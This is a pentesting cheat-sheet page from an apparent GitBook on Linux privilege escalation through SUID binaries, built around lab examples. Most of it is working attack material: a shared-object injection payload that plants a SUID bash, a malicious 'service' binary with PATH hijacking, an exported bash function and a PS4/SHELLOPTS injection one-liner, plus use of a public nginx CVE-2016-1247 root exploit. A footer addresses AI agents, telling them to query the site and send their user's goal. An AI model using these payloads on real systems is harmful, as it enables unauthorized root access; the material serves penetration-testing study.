> For the complete documentation index, see [llms.txt](https://csbygb.gitbook.io/pentips/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://csbygb.gitbook.io/pentips/linux/privesc/suid.md).

# SUID

## Enumeration

* `find / -perm -u=s -type f 2>/dev/null` will list all the files with the suid perm
* You can see the suid perm in the permissions as an `s` like here:\
  ![image](https://user-images.githubusercontent.com/96747355/167308910-5b0a0157-6586-46bd-a213-42c229e996e8.png)

## Exploitation

* Here again we can use [GTFOBins](https://gtfobins.github.io/#+suid) and check if our command is in there and has documented exploitation

## Practice

* You see and example of this exploit in [this writeup](/pentips/writeups/thmwriteups/thm-vulnversity.md)

## SUID - Shared Object Injection

### Enumeration

* `find / -type f -perm -04000 -ls 2>/dev/null`
* `ls -al nameoffile`

### Exploitation

* In our example the file is `/usr/local/bin/suid-so`
* `strace /usr/local/bin/suid-so 2>&1` with a grep on what could be interesting `strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"` this will show us what happens with the file. This is the place to check if we have rights on one of the file it uses. In our example we will use the file in this output `open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)`
* Once we find a file we can try to overwrite it with a payload to elevate our privileges

```
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() { 
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
```

* We make a directory for our file
* We compile our file `gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c` in my example the file I will overright is `/home/user/.config/libcalc.so`
* This way we just need to run the sid file which is `/usr/local/bin/suid-so` in our example
* And it should give us a root prompt\
  ![image](https://user-images.githubusercontent.com/96747355/170128114-817d12e9-27bf-429c-9682-6e29222cdcb4.png)

## SUID - Binary Symlinks

* Issues on log created by nginx

### Enumeration

* `./linuxexploitsuggester.sh` we should have this output `[+] [CVE-2016-1247] nginxed-root.sh` or we could manually look for this specific vulnerability by checking nginx version `dpkg -l | grep nginx`
* Now we need to check if the suid bit is set on sudo `find / -type f -perm -04000 -ls 2>/dev/null` or `ls -al /usr/bin/sudo`

### Exploitation

* `ls -al /var/log/nginx`
* We will need to create a malicious symlink
* We will use [this](https://github.com/xl7dev/Exploit/blob/master/Nginx/nginxed-root.sh) to do so
* `./nginxed-root.sh /var/log/nginx/error.log`
* When nginx will be restarted, we will be root\
  ![image](https://user-images.githubusercontent.com/96747355/170131842-3acc1171-23de-4d18-9691-167cf4649cc6.png)
* Check out [this resource](https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html) to learn more about this way to escalate

## SUID - Environmental Variables

### Enumeration

* `find / -type f -perm -04000 -ls 2>/dev/null` we can then chek for env var with the suid bit activated in our example we have `/usr/local/bin/suid-env` this launches apache using service (we know this by making a strings on the file).\
  ![image](https://user-images.githubusercontent.com/96747355/170258997-532e61be-117c-4e9f-9ad9-a4e6c0644716.png)

### Exploitation

* Let's create a malicious service and add it to our path so that it is launched instead of apache
* `echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c`
* `gcc /tmp/service.c -o /tmp/service`
* We now need to change our path `export PATH=/tmp:$PATH`\
  ![image](https://user-images.githubusercontent.com/96747355/170260619-089f2ad9-71ae-4dea-8283-a40ddbb0e5a7.png)
* And now we just need to run the binary `/usr/local/bin/suid-env` to escalate to root\
  ![image](https://user-images.githubusercontent.com/96747355/170260873-6b5fa24d-658b-4ba2-b2a1-f2662a4ba839.png)

## SUID - Environmental Variables with full path to binary

* `find / -type f -perm -04000 -ls 2>/dev/null` we can then chek for env var with the suid bit activated in our example we have `/usr/local/bin/suid-env2` this launches apache using its full path service (we know this by making a strings on the file).\
  ![image](https://user-images.githubusercontent.com/96747355/170265161-6ffb4183-13e3-418f-8317-5fb8ba1c1faf.png)
* `function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }` instead of creating a malicious bin we create a malicious function
* `export -f /usr/sbin/service` then we export our function in the path
* `/usr/local/bin/suid-env2` finally we just need to launch the service\
  **OR**
* `env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'`


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://csbygb.gitbook.io/pentips/linux/privesc/suid.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.